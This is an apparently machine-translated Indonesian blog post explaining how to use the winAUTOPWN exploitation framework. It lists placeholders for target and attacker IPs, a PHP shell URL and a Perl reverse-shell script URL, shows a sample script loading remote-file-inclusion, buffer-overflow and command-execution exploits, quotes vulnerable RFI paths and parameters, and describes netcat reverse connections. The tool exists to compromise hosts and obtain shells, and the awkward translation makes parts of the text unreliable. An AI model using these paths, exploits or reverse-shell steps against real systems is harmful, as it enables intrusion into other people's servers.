<EXPLOITNAME> adalah nama yang mengeksploitasi. Ex: exploitname.exe
<TARGETIP> adalah alamat IP Target Anda. Ex: 10.40.140.1
<TARGETHOSTNAME> adalah nama host Target Anda. Ex: www.somegate.com atau MP11 TSUNAMI
<ATTACKERIP> adalah IP Anda. Ex: 10.40.140.144
<CMSPATH> adalah Target CMS Path. Ex: /awstats
<ACTUALCMSPATH> adalah Path CMS sebenarnya pada disk. Ex: /usr/home/www/awstats
<PHPSHELLPATH> adalah sebuah online URL untuk php shell. Ex: http://www.shell.com/phpshell.txt
<CMSADMINUSRNAME> adalah username admin untuk Target CMS.
<FTPCMSUSRNAME> adalah Username FTP/CMS
<FTPCMSPASSWD> adalah Password FTP/CMS.
<PROXYIP> adalah alamat Proxy IP akan digunakan untuk beberapa eksploitasi melewati
<PROXYPORT> adalah nomor Port Proxy akan digunakan untuk beberapa eksploitasi melewati
<CMSPATH/> adalah jalur CMS dengan berarti trailing. Ex: /awstats/
<ACTUALCMSPATH> adalah Path CMS sebenarnya pada disk dengan trailing garis miring. Ex: /usr/home/www/awstats /
< TARGETHOSTNAME/CMSPATH > adalah alamat lengkap khas dari Target Hostname disertai lintasan CMS. Ex: www.somesite.com/awstats <
< TARGETHOSTNAME/CMSPATH/> adalah alamat lengkap khas disertai Target Hostname jalur CMS dengan trailing garis miring. Ex: www.somesite.com/awstats/
<HTTPCMSPATH> adalah path CMS mengikuti http:// standar. Ex: http://www.somesite.com/awstats
<HTTPTARGETHOSTNAME> adalah Target HostName mengikuti http:// standar. Ex: http://www.somesite.com
<PERLREVSHPATH> adalah online URL untuk perl reverse menghubungkan script. Keluaran http://vrac.fifi.be/warehouse/various/reverse-shell.pl
<MAILFROM> adalah alamat email pengirim akan digunakan dalam beberapa SMTP eksploitasi.
<MAILTO> adalah alamat email penerima untuk digunakan dalam beberapa SMTP eksploitasi.
Contoh welf script (myWELFexploits.txt) dengan tiga eksploitasi dimuat:
PERL webframe_0.76_RFI (c99)-xplt_method3.pl - vuln < TARGETHOSTNAME/CMSPATH/>-shell <PHPSHELLPATH> ^ ^ ^ ^
PYTHON Steamcast (HTTP_Request) _ (SEH) _Rem_Buf_Ovrflw_xplt.py <TARGETIP> 80 100 ^ ^ ^ ^
<PE> bitweaver_firecmd.exe <TARGETHOSTNAME> <CMSPATH/> <FTPCMSUSRNAME> <FTPCMSPASSWD> ^ ^ ^ ^
Untuk menjalankan script di atas, seperti yang disebutkan sebelumnya menjalankan
winAUTOPWN.exe –welf myWELFexploits.txt
Apa yang lain Web Aplikasi eksploitasi yang mendukung WINDOWS AUTOPWN?
WINDOWS AUTOPWN memiliki repositori besar dari eksploitasi penargetan kerentanan aplikasi web seperti Remote Shell Upload, Remote File Inklusi dan eksekusi perintah jauh. winAUTOPWN memiliki sebuah file bernama RFI_List.txt eksploitasi / direktori.
Anda dapat menambahkan file untuk menambahkan baru RFI eksploitasi bila diperlukan.
Sintaks file ini sangat sederhana:
Bahkan nomor baris berisi lintasan RFI bersama dengan berkas rentan dan nama fungsi/variabel dan aneh nomor baris berisi teks Banner yang akan bergema.
Di bawah ini adalah kutipan dari RFI_List .txt
AdaptCMS 2.0.0 Beta (init.php) Remote File Inklusi kerentanan mengeksploitasi
/Inc/Smarty/libs/init.php?sitepath=
AimEx 3.0 Remote meliputi mengeksploitasi
/Spaw/spaw_control.class.php?spaw_root=
Apa risiko yang terlibat ketika menjalankan winAUTOPWN?
  • Risiko tidak berbeda daripada terlibat ketika Anda menjalankan lain penetrasi pengujian alat atau memanfaatkan kerangka kerja. Sementara benar bahwa WINDOWS AUTOPWN mengandalkan sebagian besar pada eksploitasi tertulis dan tersedia secara bebas publik melalui internet, hal ini tidak umum di mana kita bisa melihat beberapa mengeksploitasi berjalan di liar yang menyebabkan kerusakan penyerang itu sendiri. Paling kali muatan untuk buffer overflow, tumpukan melimpah, stack overflow dll eksploitasi yang Calc.exe mereka standar untuk Windows dan uname a atau ping di Linux / lain-lain * nix. winAUTOPWN perubahan muatan ini sesuai dengan tujuan untuk mendapatkan sebuah shell. Karena muatan adalah cara yang diuji sebelum menambahkan mengeksploitasi untuk winAUTOPWN.
  • Ada beberapa eksploitasi yang membutuhkan Anda untuk membuka port untuk membalikkan menghubungkan menggunakan netcat(nc). Harap mengerti bahwa port terbuka adalah risiko. Sementara dalam skenario ini itu telah telah membuka untuk target untuk menghubungkan kembali ke Anda, Anda masih berdiri risiko baik karena port terbuka. Juga perhatikan bahwa connect sebaliknya akan membuat Anda membuka port pada setiap memanfaatkan kerangka, maka winAUTOPWN tidak apa-apa yang berbeda dalam hal ini.
  • Kadang-kadang winAUTOPWN mungkin harus menyertakan binari dikompilasi dirilis mengeksploitasi yang kode sumbernya tidak tersedia. Alasan utama untuk binari tersebut adalah karena penulis tidak memilih untuk melepaskan kode sumber. Walaupun sampai saat ini ada tidak mengeksploitasi apapun dalam winAUTOPWN's eksploitasi direktori yang menyebabkan kerusakan langsung kepada penyerang dari sistem itu sendiri, masih terbaik untuk menjadi paranoid dan karenanya WINDOWS AUTOPWN tidak menjamin atau bertanggung jawab atas apa yang mengeksploitasi yang ditulis oleh penulis tetapi ini dikatakan saya dapat menjamin Anda bahwa ada tidak mengeksploitasi sengaja ditambahkan menyebabkan kerusakan penyerang dari sistem.
Bagaimana dapat memperbarui winAUTOPWN?
WINDOWS AUTOPWN dirilis secara berkala dengan eksploitasi terbaru untuk berkompromi dan mendapatkan shell atau menjalankan perintah jauh pada sistem target Anda. Ini adalah rilis stabil. Selain ini jika Anda ingin tetap mengikuti semua eksploitasi saat ini ditambahkan harian/mingguan Anda perlu men-download versi kasar SITA winAUTOPWN yang juga tersedia pada halaman download yang sama-http://winautopwn.co.nr

Tidak ada komentar:

Posting Komentar